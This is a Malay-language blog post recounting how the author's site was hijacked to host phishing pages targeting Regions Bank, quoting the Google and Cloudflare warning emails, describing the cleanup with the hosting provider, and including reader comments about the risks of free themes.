Kronologi Phishing Attack di blog Denaihati

Spread the love

Assalamualaikum dan salam 1Dunia, memang terkejut besar apabila buka je blog Denaihati keluar warning besar “Warning : Suspect phishing page“. Dalam tempoh satu jam terima berbagai massage daripada Rakan Blogger yang tak dapat masuk blog Denaihati dan ada yang buat entri khas. Apa yang berlaku sebenarnya atas kesilapan aku yang sebenarnya tak sangka amaran yang diberi oleh Google memang serius.

Amaran Google pada 29/5/2012

Dear site owner or webmaster of denaihati.com,

We recently discovered that some pages on your site look like a possible phishing attack, in which users are encouraged to give up sensitive information such as login credentials or banking information. We have removed the suspicious URLs from Google.com search results and have begun showing a warning page to users who visit these URLs in certain browsers that receive anti-phishing data from Google.

Below are one or more example URLs on your site which may be part of a phishing attack:

http://www.info.denaihati .com//wpau-backup/wp-content/index/index.html

We strongly encourage you to investigate this immediately to protect users who are being directed to a suspected phishing attack being hosted on your web site. Although some sites intentionally host such attacks, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn’t monitor for malicious user-contributed content

If your site was compromised, it’s important to not only remove the content involved in the phishing attack, but to also identify and fix the vulnerability that enabled such content to be placed on your site. We suggest contacting your hosting provider if you are unsure of how to proceed.

Once you’ve secured your site, and removed the content involved in the suspected phishing attack, or if you believe we have made an error and this is not actually a phishing attack, you can request that the warning be removed by visiting http://www.google.com/safebrowsing/report_error/?tpl=emailer and reporting an “incorrect forgery alert.” We will review this request and take the appropriate actions.

Sincerely,
Google Search Quality Team

Terima email amaran dari Google ketika baru nak mula Kembara Musafir Beijing jadi sibuk berjalan terlupa nak ambil tindakan. Akibat daripada kesilapan mengambil ringan amaran Google blog Denaihati telah disekat lebih kurang jam 10.20 pm, 30/5/2012 kerana disyaki menjadi punca phishing attack kepada sebuah bank di USA. Dapat message pertama dari Datin Tyka pada jam 10.25 pm, terima kasih. Berikut detail yang dimaklumkan oleh Cloudflare.

[CloudFlare] has received a phishing report regarding your site pada 30/5/2012

CloudFlare received an abuse report regarding:
denaihati.com

Details about alleged infringement:
Team,

We are an Internet security company in the United States working on behalf of Regions Bank. We are contacting your organization to report phishing content targeting Regions Bank’s brand and customers that was detected on 5/30/2012. Our research shows that your organization provides hosting and/or IP services for a website that’s been compromised and is currently being used in a phishing attack. Please investigate the threat at the location(s) below:

http://www.info.denaihati.com//regions/index.html

IP Address: 141.101.124.216

This is an illegal and unauthorized copy of Regions Bank’s website that was created in an attempt to trick Regions Bank’s customers into sending sensitive personal and financial data to online criminals. We request that you deactivate this threat on your network immediately. If you are not the appropriate staff to handle this, we ask that you escalate this matter to the attention of those within your organization who can resolve this abuse issue.

Regards,

Security Incident Response Team

Apalagi cepat email Serverfreak untuk bantu selesaikan masalah yang sedang dihadapi. Seperti biasa tak sampai 3 minit Serverfreak memberi maklumbalas nak menutup connection ke subdomain info.denaihati.com yang menjadi angkara masalah. Aku garu kepada kenapalah semalam tak terfikir benda ni. Serverfreak buat siasatan apa sebenarnya yang menjadi masalah sehingga blog Denaihati jadi punca phishing attack.

Maklumat daripada Serverfreak.

that info folder they uploaded shell script and then uploaded few phishing site.

Kalau aku tak salah faham maksudnya ada manusia entah dari mana telah upload beberapa skrip phishing dalam theme subdomain info.denaihati.com dan digunakan untuk attack Regions Bank. Pernah ke kita terfikir boleh jadi macam ni. Untuk maklumat theme info.denaihati.com ini aku dapat percuma kerana menang contest. Teringat ayat dalam entri di blog Problogger.net rasanya macam betul je bila guna theme free ni.

So let’s just say it out loud so we can put it behind us: Forget about free themes! They are evil! This is something I’ve been saying for a little more than a year now. And hey, don’t blame me, it’s just the way it is. Almost all free WordPress themes include some kind of strange code in their structures, usually in the footer section. The code is encrypted, and, often, the theme stops working if you try to remove it. Also, you don’t have a clue about what’s actually in that code until you decrypt it. Just to make things clear, as a developer, designer, or simply a website owner, you never want to have any unknown code on your site.

Setelah semua masalah diselesaikan aku hantar maklumbalas kepada Google untuk mengeluarkan blog Denaihati daripada senarai warning phishing attack. Alhamdulillah pada jam 2.15 am, 31//5/2012 aku terima email daripada Google.

Phising problem [Abuse and DMCA reports]

From: Justin
Subject: Phising problem

The phishing warning has been removed from the domain.

Trafik blog jatuh merudum kerana kes phishing attack

Masalah tak abis begitu sahaja 31/5 dan 1/6 trafik blog Denaihati jatuh merudum 75%. Alhamdulillah 2/6/2012 dengan bantuan Eizil setting semula Cloudflare trafik blog kembali normal dan admin panel dah boleh masuk seperti sedia kala.

Banyak yang aku belajar dari peristiwa ini. Sekali lagi terbukti Serverfreak memang boleh diharap. Kepada yang sedang mencari hosting terbaik jangan lepaskan offer SF – Denaihati. Bagimana pulak rakan pembaca apa yang boleh dipelajari dari kes phishing attack ini?


Spread the love

162 Comments

  1. Alhamdulillah. Akhirnya kembali seperti sedia kala.

    Terima kasih Bro Dh kongsikan entri ni. Apa yg saye faham, benda2 free ni terutamanya themes free (nak2 yg kalau kita download dari rapidshare) kadang2 amat berbahaya.

  2. Fuhhh…dari sub domain rupanya…bahaya betul laa…org akan cr peluang utk buat mende2 cam nih…gamaknya yg tukang buat tu dr mana bro…malaysia atau luar negara?

    1. Ini yg blogger2 otai selalu sebut agaknya. Jgn suka sangat pakai free themes. Kdang2 tersembunyi skrip2 yg bersedia utk rosakkan blog kita…bahaya2

  3. Info dibaca masih keliru utk dihayati,
    Tak tahu bagaimana boleh terjadi,
    Mungkin masalah ini amat besar utk diatasi,
    Memerlukan pada yg pakar utk tangani.

  4. Tiada masalah tidak dpt diselesaikan,
    Cuma besar atau kecil saja,
    Blog DH dah dipulihkan,
    Moga ada info lain lagi utk dibaca.

  5. Dh kena buat byk lagi entri ttg masalah ini, mungkin ini adalah buat permula kerana sebab2 terjadi telah diterangkan tapi cara mengatasi atau membuang phising tu masih samar-samar, tak tahu caranya. Mungkin juga nak buang bukan perkara yg senang kot tanpa dirujuk pada yg pakar spt eizil.

  6. Rasanya macam dah dijangkakan, macam musim ajer… terdapat beberapa script template/themes yang orang tanam (atau sengaja hantar).. member2 kat oversea ramai dah tekena (ada dicoretkan dalam artikel) dari high to medium trafik. Bermaksud, kejadian sebegini boleh terjadi kepada blog/domain sesiapa sahaja. Sama2 lah kita berhati2 dan buat kawan dengan hosting…. To DH, nampak gaya, dalam permehatian pak Google lagi nih… sama2lah kita pulihkan trafiks DH…

Comments are closed.

OTHER POSTS

Subscribe to Denaihati

Dapatkan artikel terkini terus dalam email anda!